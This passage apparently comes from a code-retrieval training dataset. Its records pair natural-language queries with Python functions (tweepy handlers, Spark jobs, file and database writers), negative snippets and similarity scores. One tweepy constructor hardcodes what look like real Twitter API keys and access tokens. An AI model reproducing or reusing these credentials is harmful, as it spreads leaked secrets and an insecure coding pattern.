sudo mkdir -m 1777 /mnt/tmp\")\n ssh_client.run(\"sudo mount --bind /mnt/tmp /tmp\")\n\n ssh_client.run('ssh-keygen -f \"/home/ubuntu/.ssh/known_hosts\" -R localhost')\n\n print(\" Stop Spark Slave/Master\")\n # ssh_client.run('export SPARK_HOME=\"{s}\" && {s}sbin/stop-slave.sh'.format(s=c.SPARK_HOME))\n ssh_client.run('export SPARK_HOME=\"{s}\" && {s}sbin/stop-master.sh'.format(s=c.SPARK_HOME))\n ssh_client.run('export SPARK_HOME=\"{s}\" && sudo {s}sbin/stop-slave.sh'.format(s=c.SPARK_HOME))\n \n stdout, stderr, status = ssh_client.run(\n \"cd \" + c.SPARK_HOME + \" && cp conf/log4j.properties.template conf/log4j.properties\")\n print(stdout, stderr)\n print(\" Set Log Level\")\n ssh_client.run(\n \"sed -i '19s/.*/log4j.rootCategory={}, console /' {}conf/log4j.properties\".format(c.LOG_LEVEL,\n c.SPARK_HOME))\n if c.KILL_JAVA:\n print(\" Killing Java\")\n ssh_client.run('sudo killall java && sudo killall java && sudo killall java')\n\n print(\" Kill SAR CPU Logger\")\n ssh_client.run(\"screen -ls | grep Detached | cut -d. -f1 | awk '{print $1}' | xargs -r kill\")\n\n if c.SYNC_TIME:\n print(\" SYNC TIME\")\n ssh_client.run(\"sudo ntpdate -s time.nist.gov\")\n\n print(\" Removing Stopped Docker\")\n ssh_client.run(\"docker ps -a | awk '{print $1}' | xargs --no-run-if-empty docker rm\")", "def main():\n sc = pyspark.SparkContext(conf=sparkConf())\n sql = pyspark.SQLContext(sc)\n args = parse_args()\n cleanOutputDir(args.output)\n users = os.listdir(args.input)\n map(lambda user: parseUser(user, args, sql, args.partitions), users)\n corpora_stats(args.output)\n append_corpus(args.output)", "def main(self, sc: SparkContext, *args):\n mgi_strain_report_path = args[0]\n output_path = args[1]\n\n spark = SparkSession(sc)\n\n strain_df: DataFrame = extract_tsv(\n spark, mgi_strain_report_path, schema=STRAIN_SCHEMA, header=False\n )\n strain_df.write.mode(\"overwrite\").parquet(output_path)", "def run(self, config):\n transformer = hadoop_csv_transformer.HadoopCsvTransformer(config)\n transformer.StartTransform()", "def spark_config_reset(is_spark_submit):\n if is_spark_submit:\n sc.stop()\n print \"End of the job!\"", "def test_first_run():\n setup_first_run(\".\", True, extra_context={\"number_of_iterations\": 2, \n \"project_name\": \"first_run_test\",\n \"logging_frequency\": 1,\n \"enable_cuda\": False\n })\n\n generated_project_dir = Path(\"first_run_test\")\n assert generated_project_dir.is_dir()\n assert (generated_project_dir / \"facades\" / \"train\" / \"A\" ).is_dir()\n assert (generated_project_dir / \"facades\" / \"train\" / \"B\" ).is_dir()", "def process_test_start(self, config, results, result_id, db):\n pass", "def __init__(self, spark, logger):\n self.spark = spark\n self.logger = logger", "def start_test_exec(cls):\n time_str = cls.get_current_time()\n os.system(\"robot -l ./logs/log_{0}.html -r ./logs/report_{0}.html -o ./logs/output_{0}.xml \\\n ./test_suite/{1}\".format(time_str, test_suite))" ]
[ "0.77397996", "0.70026386", "0.68174267", "0.68167377", "0.6324946", "0.632194", "0.63131744", "0.62284076", "0.61973965", "0.6191538", "0.615016", "0.61465317", "0.6010293", "0.5978047", "0.59729236", "0.59613144", "0.59418756", "0.5929893", "0.5851277", "0.5777042", "0.57738715", "0.5762342", "0.57530385", "0.5751811", "0.5738633", "0.5706134", "0.5672585", "0.56560445", "0.562517", "0.5595054", "0.55949837", "0.55782855", "0.5572695", "0.5539492", "0.5518825", "0.55187565", "0.55168784", "0.55148244", "0.54688704", "0.54685193", "0.54658264", "0.5461699", "0.5423668", "0.54143584", "0.54031396", "0.53869224", "0.5377008", "0.53746927", "0.5372838", "0.53365767", "0.5333173", "0.5327857", "0.53192997", "0.5303515", "0.52948487", "0.52789414", "0.52024406", "0.51942897", "0.5183699", "0.51818955", "0.5172643", "0.5172483", "0.51673305", "0.51608825", "0.51560694", "0.5154963", "0.51362044", "0.51344955", "0.513435", "0.5125955", "0.5122752", "0.5118688", "0.5115201", "0.5111694", "0.51105577", "0.5099745", "0.5098707", "0.50903696", "0.5086317", "0.5082859", "0.507956", "0.5074343", "0.50695133", "0.50681657", "0.50583786", "0.5048103", "0.5047962", "0.5036374", "0.50328684", "0.50300443", "0.50296104", "0.502688", "0.5024736", "0.5023967", "0.5016583", "0.50141174", "0.5013146", "0.50103813", "0.49974713", "0.49968344" ]
0.50840384
79
Write to file or write to db
def on_data(self, tweet): if (time.time() - self.start_time) < self.limit: self.saveFile.write(tweet) return True else: self.saveFile.close() return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, **kwargs):\n # First, attempt to update the local store\n self.update()\n # Only get here if the file doesn't already exist\n with open(self._db_file, 'w') as fp:\n json.dump(self.to_dict(\"JSON\"), fp, **kwargs)", "def writedb(path, key, value) -> int:\n if key == \"\" or value == \"\":\n return 1\n if os.path.exists(path):\n pass \n else:\n return 1\n with open(path, \"a\") as db:\n db.write(f\"\\n{key}:{value}\")\n return 0", "def write_db(self, data, update=True):\n if update:\n self.read_db()\n self.data[self.key].append(data)\n try:\n with open(self.filename, 'w+') as database:\n json.dump(self.data, database, indent=2)\n except json.JSONDecodeError as err:\n raise err", "def _write(self, data):\n self.db.append(data)\n\n with open(self.DB_FILE, 'w') as outfile:\n json.dump(self.db, outfile)", "def write_data():", "def save(self):\r\n debug.write(\"[SourceRPG] Handling SQL Save\", 1)\r\n if self.path != \":memory:\":\r\n debug.write(\"Path is not in memory\", 2, False)\r\n if currentTurboMode is False:\r\n debug.write(\"We are not in turbo mode\", 2, False)\r\n self.connection.commit()\r\n debug.write(\"[SourceRPG] SQL Save handled\", 1)", "def writeFile( self, file_handle=None, table_name=None, data=None ):\n\n # Record the next primary key id.\n nextId = self.nextPrimaryKey( table_name )\n\n # Generate the string list of data to be written in the file.\n values = '\\t'.join( data )\n\n # Actual put together the primary key id, the string values and the new line character to be writen in the file.\n insert = str(nextId) + '\\t' + str(values) + \"\\n\"\n\n # Write the stuff in the file.\n file_handle.write( insert )\n\n # DON'T MESS WITH THAT!!!!! YOU'RE WARNED!!!\n # Messing with this cute id will kill your importer because the table relationships files relies on that!!!\n # Take a look on the lines like 'taxonomiesInserted' or 'proteinsInserted'.\n return nextId", "def write(self):\n db_handle = open(settings.DATA_PATH, 'wb')\n cPickle.dump(dict(self), db_handle)\n db_handle.close()", "def write_to_file(self, filename: str) -> None:", "def write_db(db):\n with open(db_file, 'w') as f:\n json.dump(db, f, indent=4)", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def write(self, fname):\n pass", "def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()", "def _batch_write(self):\n if self.to_put:\n db.put(self.to_put)\n self.to_put = []\n if self.to_delete:\n db.delete(self.to_delete)\n self.to_delete = []", "def save_db(self) -> None:", "def file_write(stuff, file_path):\n with open(file_path, \"wt\") as fo:\n fo.write(stuff)", "def write_to(self, fname, **kwargs):\n data = self.to_Table()\n data.write(fname, **kwargs)", "def write(data):", "def saveOnFile(self, path, data):\n with open(path, \"w\") as f:\n f.write(data)", "def db_for_write(self, model, **hints):\n return None", "def write(cls, file, data):\n file.write(data)", "def write( data ):", "def write (self, path):\n\t\ts=[]; add=s.append\n\t\tadd ('\\t'.join (self.schema))\n\t\tfor record in self.data:\n\t\t\tadd (record.asTabDelimitedRecord())\n\t\t\n\t\t# f = open (path, 'w')\n\t\tf = codecs.open(path, 'w', 'utf-8')\n\t\tf.write (self.linesep.join (s))\n\t\tf.close()\n\t\tprint (\"data written to \" + path)", "def write(self):\n if not self._table: raise ValueError ( \"_table is Null\" )\n if self._isnew:\n for m in self._modified_values:\n self._modified_values[m] = self._table[m].val_py2sql(self._modified_values[m])\n \n try:\n rec 
= CFG.CX.insert ( CFG.DB.SCHEMA + \".\" + self._table.name,\n self._modified_values )\n #this will automatically re-read the data from the db, to take all changes\n #done by triggers and default values into account.\n self._objectid = rec['objectid']\n\n #print \"Record # {0} inserted into {1}.\".format(self._objectid, self._table.name)\n self.raiseEvent ( \"record_added\", self )\n \n except pg.DatabaseError, e:\n print \"Error inserting record.\"\n raise Record.DataManipulationError ( \"Inserting a new record into '{0}'\".format(self._table.name),\n str(self._modified_values),\n e)\n elif self._ismodified:\n \n for m in self._modified_values: \n self._modified_values[m] = self._table[m].val_py2sql(self._modified_values[m])\n \n self._modified_values['objectid'] = self._objectid\n del self.TextCache[self._objectid]\n try:\n rec = CFG.CX.update ( CFG.DB.SCHEMA + \".\" + self._table.name,\n self._modified_values )\n self.read() \n self.raiseEvent ( \"record_saved\", self )\n except pg.DatabaseError, e:\n print \"Error updating record\"\n raise Record.DataManipulationError ( \"Updating record {1} of '{0}'\".format(self._table.name, self._objectid),\n str(self._modified_values),\n e)", "def write_file_set(self, write_file):\n self._write_file = write_file", "def _write_to_datastore(self, index, doc_type, document, login, path):\n if self.config['Github']['datastore'] == 'filesystem':\n filename = self._generate_filename(doc_type, login)\n self._save_file(json.dumps(document), path, filename)\n elif self.config['Github']['datastore'] == 'elasticsearch':\n self._save_elasticsearch(document, index, doc_type)\n elif self.config['Github']['datastore'] == 'both':\n filename = self._generate_filename(doc_type, login)\n self._save_file(json.dumps(document), path, filename)\n self._save_elasticsearch(document, index, doc_type)\n else:\n error_msg = \"Unable to save result data for {}. 
Check \" \\\n \" configuration file setting: {}\" \\\n .format(doc_type, self.config['Github']['datastore'])\n self.logger.error(error_msg)", "def test_write_data(dbh):\n mock_path = '/tmp/test.json'\n if os.path.exists(mock_path):\n os.remove(mock_path)\n assert not os.path.isfile(mock_path)\n assert dbh.write_data(mock_path)\n assert os.path.isfile(mock_path)", "def write(self, filename, data):\n raise NotImplementedError", "def save(self, data):\n self.write(data)", "def writeToDB(self, eventDateTime, eventFileName, eventType, eventPath):\n conn = self.createConnection()\n c = conn.cursor()\n\n c.execute(\"INSERT INTO RansomedFiles (TIME, EventFileName, EventType, EventPath) VALUES (?,?,?,?)\", (eventDateTime, eventFileName, eventType, eventPath))\n conn.commit()\n conn.close()\n\n # print(\"[+]Wrote to the database successfully!\")", "def write_to_db( self, *args ):\n try:\n toSave = [ a for a in args ]\n # save them\n self.session.add_all( toSave )\n self.session.commit()\n self._fire_save_notification()\n return True\n except Exception as e:\n print( \"Error : %s\" % e )\n self._fire_error_saving_notification( e )\n return False", "def write_db(db):\n\n # Look for database in the same folder as this script\n script_dir = os.path.dirname(os.path.realpath(__file__))\n db_filepath = os.path.join(script_dir, 'cn_loads_database.dat')\n\n with open(db_filepath, 'w') as f:\n f.write(yaml.dump(db, default_flow_style=False))", "def writedata(self,filename_): # 3\n res = self.__obj.writedata(filename_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)", "def write_database(self, updated_database):\n self.database_lock.acquire()\n try:\n json.dump(updated_database, open(self.database_name, \"w\"))\n except Exception as e:\n print(e)\n assert False, 'Unable to write database'\n finally:\n self.database_lock.release()", "def dbWrite(dbPoint, formatedValue):\n raise NotImplementedError('dbWrite in simu mode')", "def _writeRecord(self, path, name, data):\n file_path = os.path.join(path, name)\n with open(file_path, 'w') as f:\n for item in data:\n f.write(str(item)+'\\t')\n f.write('\\n')", "def write(self,path,content):\n file_path = os.path.join( self.directory, path)\n with open(file_path, \"w\") as file:\n file.write( content )", "def write(self, content):\n ...", "def save(self, db):\n pass", "def fs_write(obj, file_path):\n try:\n with open(str(file_path), 'w') as f:\n f.write(obj)\n return obj\n except TypeError as e:\n raise e", "def enablewrite(self):\n if self.mode == 'write':\n return\n self.file.close()\n self.mode = 'write'\n self._load_file()", "def write_to_database(info,timer):\n\n inserts = create_sql_write(info,timer)\n\n connection = engine.connect()\n for insert in inserts:\n connection.execute(insert)\n connection.close()", "def write():\n pass", "def write(self, data_to_write, overwrite=False):\n\n if data_to_write is not None and isinstance(data_to_write, str):\n if overwrite or not path.isfile(self.file):\n with open(self.file, \"w\", encoding=\"utf-8\") as file:\n file.write(data_to_write)\n else:\n with open(self.file, \"a\", encoding=\"utf-8\") as file:\n file.write(data_to_write)", "async def exec_write(self, query, *args):", "def write(self, filename, data):\n owner_rw = 0600\n fd = os.open(filename, os.O_WRONLY | os.O_CREAT, owner_rw)\n # In case file existed already with wrong permissions, fix them.\n os.chmod(filename, owner_rw)\n os.write(fd, data)\n os.close(fd)", "def save_in_db(self):\n self.sql_database.table_name = 
self.table_db\n self.sql_database.db_name = self.db\n if self.sql_database.insert_item(text_path=self.path, word_first=self.word_1.get(),\n word_second=self.word_2.get(),\n word_third=self.word_3.get(), word_fourth=self.word_4.get(),\n word_fifth=self.word_5.get()):\n msg.showinfo(message=\"Done\")", "def write_to_file(file: Text, data: bytes):\n with open(file, \"wb\") as w:\n w.write(data)\n w.flush()", "def write(self, outfile, rebasings=None):\r\n raise NotImplementedError()", "def save(database, resource):\n # TODO\n pass", "def save_to(self, f: BinaryIO):\n raise NotImplementedError", "def write(self, path, content):\n this_file = open(path, 'w')\n this_file.write(content)\n this_file.close()", "def test1_write():\n with open(FILE_DIR + FILE_NAME, mode='w', encoding='utf-8') as f:\n f.write(DATA)", "def write_to_db( self ) :\n # first lets update the json file internally through: modify the path to figures\n # The json file has two keys: info and processes\n # we loop over all processes and we change the value of the key figure\n for proc in self.data[\"processes\"].keys():\n # for keys in self.data[\"processes\"][proc].keys():\n # each process has one figure\n try:\n # if keys == \"figure\":\n old_value = self.data[\"processes\"][proc][\"figure\"]\n new_value = self.datapath + \"/\" + old_value\n self.data[\"processes\"][proc][\"figure\"] = new_value\n except Exception as err:\n print( 'The key %s does not exist in the json file' % 'figure' )\n print( err )\n\n # Check the existence of the current json file inside the data base\n # the name of the json file starts with run_number as: run_number.json\n try:\n if self.collection.find_one({\"info.run\": {\"$eq\": self.run_number}}):\n # if the document with the given run number exists, delete it and re-write\n print( \"File %s already in database\" % self.data[\"info\"][\"filename\"] )\n self.collection.delete_one( {\"info.run\": {\"$eq\": self.run_number}} )\n self.collection.insert_one( self.data )\n\n else:\n print('File %s is going to be dumbed' % self.data[\"info\"][\"filename\"])\n self.collection.insert_one( self.data )\n\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print('the data base server is down')\n print(err)\n sys.exit('check the database server if it is up and running ?')\n\n return 0", "def write_gp_dbid(self):\n INFO = self.logger.info\n INFO('%s - write_gp_dbid' % self.filepath)\n\n if os.path.exists(self.filepath):\n INFO('found existing file')\n\n os.remove(self.filepath)\n INFO('removed existing file')\n\n self.logger.info('opening new file')\n with open(self.filepath, 'w') as f:\n self.format(f)\n\n INFO('setting read only')\n os.chmod(self.filepath, stat.S_IRUSR) # user read permissions (0400)\n\n INFO('verifying file')\n v = GpDbidFile(self.datadir, do_read=True)\n assert self.dbid == v.dbid\n assert self.standby_dbid == v.standby_dbid", "def write(file, text):\n with open(file, 'w') as f:\n f.write(text)", "def save(self):\n args = list(map(self._get_value_or_default, self.COLUMN_TO_FILED))\n columns = list(map(lambda k: k, self.COLUMN_TO_FILED))\n sql = 'INSERT INTO {} ({}) VALUES({});'.format(\n self.TABLE_NAME,\n ', '.join(columns),\n '%s,'.join(' '*len(columns)) + '%s'\n )\n cursor = yield self._pool.execute(sql, args)\n app_log.info('save arg %s', args)\n count = cursor.rowcount\n result = True if count == 1 else False\n return result", "def save_to_file(self, data):\n\t\tif self.data_file.write(data):\n\t\t\tprint(\"Data successfully added to file\")\n\t\telse:\n\t\t\tPrint(\"Problem 
occured during adding to file\")", "def write(self, id, data):\n return self._call('%s.update' % self._shopware_model,\n [int(id), data])", "def write_to_db(self, doc):\n self.db_connection[self.db_name][self.db_collection].insert_one(doc)", "def execute_write(function):\n raise NotImplementedError(\"execute_write() has not been implemented\")", "def write(*name):\n foo = Foo(' '.join(name))\n with open(DBNAME, 'w') as f:\n f.write(pickle.dumps(foo))", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write(self, data):\n self.mycol.insert_one({\"query\":data})", "def write(self, data):\n return self._write(self.wfile, data)", "def saveDbToDisk (self):\n\n currentThread=threading.currentThread()\n self._logIo(\"save-db-to-disk\").debug1(\"starting to save db for instance %s. thread-id=%d\", self._instanceName, currentThread.ident)\n\n # We dump the dict to Json format\n try:\n a.infra.format.json.writeToFile(self._logIo, self._cidLastAccessTimeDict, self._dbFileFullNamePath)\n except Exception as ex:\n self._logIo(\"error-write-db-file\").error(\"error writing db to file='%s'. exception: %s\", self._dbFileFullNamePath, ex)\n\n # We dump prediction counters for presistency\n try:\n a.infra.format.json.writeToFile(self._logIo, self.counters, self._countersFileFullNamePath)\n except Exception as ex:\n self._logIo(\"error-write-counters-file\").error(\"error writing counters to file='%s'. exception: %s\", self._countersFileFullNamePath, ex)\n \n return self._dbFileFullNamePath, self._dbFailedToRemoveFileFullNamePath", "def write_to_database(database, table, data):\r\n in_tests.test_write_to_database_from_dict(database, table, data)\r\n print (f\" Insert or update data in `{database} > {table}`...\")\r\n\r\n connection = sqlite3.connect(database)\r\n cursor = connection.cursor()\r\n counter = 1\r\n query_columns = \", \".join(data.keys())\r\n query_values = f\"{'?, ' * len(data)}\"[:-2]\r\n query = \\\r\nf\"INSERT OR REPLACE INTO {table} ({query_columns}) VALUES ({query_values});\"\r\n cursor.execute(query, list(data.values()))\r\n connection.commit()\r\n database_changes = connection.total_changes\r\n cursor.close()\r\n connection.close()\r\n out_tests.test_write_to_database(database_changes, counter)\r\n return (database_changes)", "def write(self, content):\n pass", "def save_to_file(self, file_path):\n if file_path:\n f = open(file_path, 'w')\n for row in range(self.rows):\n f.write(''.join(self.data[row]) + '\\n')\n f.close()", "def save_to_file(self, file_path):\n if file_path:\n f = open(file_path, 'w')\n for row in range(self.rows):\n f.write(''.join(self.data[row]) + '\\n')\n f.close()", "def writeToFile(self, basedir, write_code=0):", "def write(self, arg, **kwargs):\r\n if hasattr(arg, 'seek'):\r\n self._tofile(arg, **kwargs)\r\n else:\r\n with open(arg, 'wb') as fid:\r\n self._tofile(fid, **kwargs)", "def write_log_to_db(data, error):\n data.content = error\n data.timestamp = Timestamp.timestamp()\n data.dataset = data.name\n log_to_db(data)", "def w(self, value):\n self.oFile.write(value)", "def write_table(table, file_path):\n\n\twith open(file_path, 'w') as file:\n\t\tfile.write(table)", "def write_student_to_db(cls, file_name, obj_list):\n conn = sqlite3.connect('database.db')\n c = conn.cursor()\n query = \"DELETE FROM `student`;\"\n c.execute(query)\n\n for obj in obj_list:\n params = [obj.name, obj.surname, obj.email, obj.password, obj.status, obj.card, obj.team, obj.id]\n c.execute(\"INSERT INTO student (name, surname, email, password, 
status, card, team, student_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\", params)\n conn.commit()\n\n conn.close()", "def write(self, *args) -> \"int\":\n return _ida_fpro.qfile_t_write(self, *args)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def file_write(self, filename, contents, append=True, create=True):\n return self._file_model.file_write(filename, contents, append=append, create=create)", "def save(self, output, data):", "def write(self):", "def write(self):", "def write_staff_to_file(cls, file_name, obj_list): # for staff\n conn = sqlite3.connect('database.db')\n c = conn.cursor()\n\n for obj in obj_list:\n if obj.status == \"mentor\":\n query = \"DELETE FROM `staff` WHERE `status` = 'mentor';\"\n c.execute(query)\n elif obj.status == \"employee\":\n query = \"DELETE FROM `staff` WHERE `status` = 'employee';\"\n c.execute(query)\n elif obj.status == \"manager\":\n query = \"DELETE FROM `staff` WHERE `status` = 'manager';\"\n c.execute(query)\n\n for index, obj in enumerate(obj_list):\n params = [obj.name, obj.surname, obj.email, obj.password, obj.status, obj.id]\n c.execute(\"INSERT INTO staff (name, surname, email, password, status, staff_id) VALUES (?, ?, ?, ?, ?, ?)\", params)\n conn.commit()\n\n conn.close()", "def write(self):\n\t\traise NotImplementedError('%s: No write function implemented!' % self.name)", "def write_res(res):\n if res is None:\n return None\n db = Database('requsts_res.sqlite3')\n curs = db.connect()\n try:\n curs.execute('''INSERT INTO content_new (url, binary_content) VALUES (?,?)''', (res.url, res._content,))\n db.conn.commit()\n except sqlite3.ProgrammingError as e:\n print('Database Error')\n print(e)\n raise e", "def write_to_databse(fileName):\n f = open(fileName)\n queries = eval(open(fileName).read())\n for q in queries:\n site.write(q)\n print \"Quries are saved:)\"", "def Save(self) -> None:\n self.__conn.commit()", "def writeto(self, fileout):\n \n dump_pkl(self.data, fileout)", "def writeDataToFile(self):\n if self.data is not None:\n self.notify.debug('Data is now synced with disk at %s' % \\\n self.filepath)\n if self.wantAnyDbm:\n self.data.sync()\n else:\n try:\n backuppath = self.filepath+ '.bu'\n if os.path.exists(self.filepath):\n os.rename(self.filepath,backuppath)\n \n outfile = open(self.filepath, 'w')\n cPickle.dump(self.data,outfile)\n outfile.close()\n \n if os.path.exists(backuppath):\n os.remove(backuppath)\n except EnvironmentError:\n self.notify.warning(str(sys.exc_info()[1]))\n else:\n self.notify.warning('No data to write. 
Aborting sync.')", "def fileWrite(content):\n file = open('./result.txt', 'w')\n file.write(content)\n file.close()", "def write(cls, path, text):\n with cls.open(path, 'wt') as fd:\n return fd.write(text)", "def write_file(self, stream_name:str, data:DataStream.data, file_mode:str) -> bool:\n data_path = self._get_storage_path(stream_name=stream_name)\n if isinstance(data, pd.DataFrame):\n try:\n table = pa.Table.from_pandas(data, preserve_index=False)\n pq.write_to_dataset(table, root_path=data_path, partition_cols=[\"version\", \"user\"])\n return True\n except Exception as e:\n raise Exception(\"Cannot store pandas dataframe: \"+str(e))\n else:\n try:\n data.write.partitionBy([\"version\",\"user\"]).format('parquet').mode(file_mode).save(data_path)\n return True\n except Exception as e:\n raise Exception(\"Cannot store spark dataframe: \"+str(e))", "def _write(self):\n # Reload\n with portalocker.Lock(self.filename, 'w') as fh:\n self.data.to_csv(fh, index=False)\n fh.flush()\n os.fsync(fh.fileno())", "def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()", "def write_img_to_db():\n with lite.connect(\"test.db\") as con:\n cur = con.cursor()\n data = read_image_from_fs()\n binary = lite.Binary(data)\n cur.execute(\"INSERT INTO Images(Data) VALUES (?)\", (binary,))", "def writable(path):", "def __write_repository(self, handle, nbr):\n try:\n repository = self.database.get_repository_from_handle(handle)\n self.__write_row(nbr, handle, repository)\n except:\n repository = \"NOT FOUND\"\n self.__write_row(nbr, handle, repository)", "def _write(self, tkt_id, repo_id, changesets):\n @self.env.with_transaction()\n def do_update(db):\n cursor = db.cursor()\n value = str(changesets)\n if changesets.exists:\n if value:\n cursor.execute('UPDATE ticket_changesets SET value=%s '\n 'WHERE ticket=%s AND repository=%s',\n [value, tkt_id, repo_id])\n else:\n cursor.execute('DELETE FROM ticket_changesets '\n 'WHERE ticket=%s AND repository=%s',\n [tkt_id, repo_id])\n elif value:\n cursor.execute('INSERT INTO ticket_changesets '\n '(ticket,repository,value) VALUES(%s,%s,%s)',\n [tkt_id, repo_id, value])", "def save(self,file):\n\n with open(file,\"w\") as f:\n f.write(self.to_string())", "def _write(self, location, data):\n self._connector.write(location=location, data=data)" ]
[ "0.6699802", "0.6676422", "0.65458137", "0.6534973", "0.6344988", "0.6320584", "0.6263552", "0.62094015", "0.62065643", "0.6195185", "0.61912936", "0.61912936", "0.6186057", "0.6150113", "0.6143777", "0.6141619", "0.6129302", "0.61252534", "0.61246955", "0.61167467", "0.61080414", "0.60606027", "0.60548145", "0.603256", "0.6030213", "0.5997574", "0.5981836", "0.5960659", "0.59564465", "0.5950212", "0.5942887", "0.5933396", "0.5926967", "0.59051025", "0.5904766", "0.59023815", "0.59004253", "0.5882206", "0.5852268", "0.58408636", "0.5833231", "0.58327425", "0.5830164", "0.5815565", "0.58067083", "0.5799307", "0.57911223", "0.57779175", "0.5761322", "0.5742469", "0.5733874", "0.5727971", "0.5726819", "0.57196695", "0.5714592", "0.57061464", "0.57005787", "0.569277", "0.5689303", "0.5681548", "0.56815374", "0.56731594", "0.5672426", "0.5658898", "0.5657049", "0.565646", "0.5651614", "0.5643764", "0.5642562", "0.5640908", "0.5640908", "0.56398684", "0.56398237", "0.5638615", "0.5636588", "0.5634717", "0.56240684", "0.5623289", "0.5617745", "0.5607716", "0.5605805", "0.55990326", "0.55990326", "0.55830616", "0.5582819", "0.5582411", "0.55766857", "0.5571966", "0.557108", "0.55637884", "0.55619115", "0.556008", "0.5553425", "0.5543471", "0.55338556", "0.5532042", "0.5531678", "0.552898", "0.5524833", "0.5522308", "0.5519238" ]
0.0
-1
Authenticate, define interested topics to search, define running mode
def __init__(self, topics=None, tweet_file=None, mode='batch'): self.topics = topics # (The twitter API will only return a max of 100 count) self.GEN_MAX_TWEET = 100 # the max number of tweets to generate self.tweet_file = tweet_file self.mode = mode self.tweets = [] if topics and tweet_file: print("WARNING! you input both topics and the tweet file, only one is expected") exit(-1) if not topics and not tweet_file: print("WARNING! you input either topics or tweet file, one is expected") exit(-1) # If file argument is given, it will not connect to twitter server # It will just save tweets in self.tweets if tweet_file: with open(tweet_file, 'r') as infile: for line in infile: self.tweets.append(json.loads(line)) else: consumer_key = 'bbqKfXEU2VJNoWlYJvbdtptOE' consumer_secret = 'afPk2JuMMMD6IhP5Xijo60ni4FUK39PDzhU7ylgT9FgNZX9ngh' access_token = '434708489-DTeHfK4OYKRuIXlfoWnNgzzwpEZTPCEpSMv8C0ll' access_token_secret = 'SjWFYfX2k3q4RJKQXcP1LP9ikhRfckPKOEcrb2cpQ0A0n' # Attempt authentication try: # create OAuthHandler object self.auth = tweepy.OAuthHandler(consumer_key, consumer_secret) # set access token and secret self.auth.set_access_token(access_token, access_token_secret) # create tweepy API object to fetch tweets self.api = tweepy.API(self.auth) except: print("Error: Authentication Failed") exit(-1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_topic_retrieval_authenticated(self):\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.free_token.key)\n response = self.client.get('/topics/', format='json')\n data = json.loads(response.content)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(data['count'],3)\n self.assertTrue({'name': 'Topic 1', 'description': 'The first topic.'} in data['results'])\n self.assertTrue({'name': 'Topic 2', 'description': 'The second topic.'} in data['results'])", "def topics(ctx):\n pass", "def main():\n\n config_file = 'auth_demo.cfg'\n config = ConfigParser.SafeConfigParser({\n 'username':'',\n })\n config.read(config_file)\n if not config.has_section('auth_demo_login'):\n config.add_section('auth_demo_login')\n\n username = config.get('auth_demo_login','username')\n password = None\n if username != '':\n password = keyring.get_password('auth_demo_login', username)\n\n if password == None or not auth(username, password):\n\n while 1:\n username = raw_input(\"Username:\\n\")\n password = getpass.getpass(\"Password:\\n\")\n\n if auth(username, password):\n break\n else:\n print \"Authorization failed.\"\n \n # store the username\n config.set('auth_demo_login', 'username', username)\n config.write(open(config_file, 'w'))\n\n # store the password\n keyring.set_password('auth_demo_login', username, password)\n\n # the stuff that needs authorization here\n print \"Authorization successful.\"", "def test_topic_list_view_authenticated(self):\n self.assertTrue(self.client.login(username=\"test\", password=\"test\"))\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[\"topics\"]), 4)", "def main()->None:\n #Define key words\n keyword_list = ['#DataScience', '#MachineLearning', '#artificialintelligence', '#AI', '#ai', '#machinelearning',\n '#deeplearning', 'DeepLearning', '#ML', '#ArtificialIntelligence', '#machinelearning',\n 'DigitalTransformation'] # track list\n\n #Initiate Time\n start_time = time.time() # grabs the system time\n print(\"Launch! 
\\n\")\n\n #Listen to twitter\n twitterStream = Stream(Authentification(), listener.Listener(start_time, time_limit=3600)) # initialize Stream object with a time out limit\n twitterStream.filter(track=keyword_list, languages=['en']) # call the filter method to run the Stream Object\n print('Exctraction from twitter succesful')", "def authenticate(self, username, password, consumerKey, consumerSecret):\r\n pass", "def auth():\n pass", "def auth():\n pass", "def test_single_topic_retrieval_authenticated(self):\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.free_token.key)\n response = self.client.get('/topic/Topic 1/', format='json')\n data = json.loads(response.content)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(data['name'],'Topic 1')\n self.assertEqual(data['description'],'The first topic.')", "def authn_and_authz():\n authentication()\n authorization()", "def auth(self):\n try:\n print(\"You are going to log in as Полигон\")\n os.system('clear')\n self.session = vk_api.VkApi(token=self.token)\n self.session._auth_token()\n print(\"authred\")\n vk = self.session.get_api()\n global authed\n self.authed = True\n print('gAut Online')\n self.longpollserver = bot_longpoll.VkBotLongPoll(self.session, 172301854)\n self.gLPS = threading.Thread(target=self.lps, args=(self.session, ), daemon=True)\n return True\n except Exception as e:\n print(e)\n pass", "def main():\t\n\t# read in short term auth\n\tf = open('./input.txt', 'r')\n\tshort_term_auth = f.read()\n\n\tlong_term_access_token = long_term_token(short_term_auth)\n\tprint(long_term_access_token)\n\tprint('run program like normal now')", "def authenticate( self ):\n\n print(\"Getting new token\")\n self.getFrob()\n self.getAuthKey()\n self.getToken()\n self.cacheToken()", "def _authenticate(self):\n\t\tfrom getpass import getpass\n\t\tpassword = getpass()\n\t\tself.msg('nickserv', 'identify %s' % password)", "def _authenticate(self):\n auth = self.settings.get(\"auth\")\n if auth:\n if auth == Auth.PLAIN:\n self._authenticate_plain()\n elif auth == Auth.SHA256_MEMORY:\n self._authenticate_sha256_memory()\n elif auth == Auth.MYSQL41:\n self._authenticate_mysql41()\n elif self.stream.is_secure():\n # Use PLAIN if no auth provided and connection is secure\n self._authenticate_plain()\n else:\n # Use MYSQL41 if connection is not secure\n try:\n self._authenticate_mysql41()\n except InterfaceError:\n pass\n else:\n return\n # Try 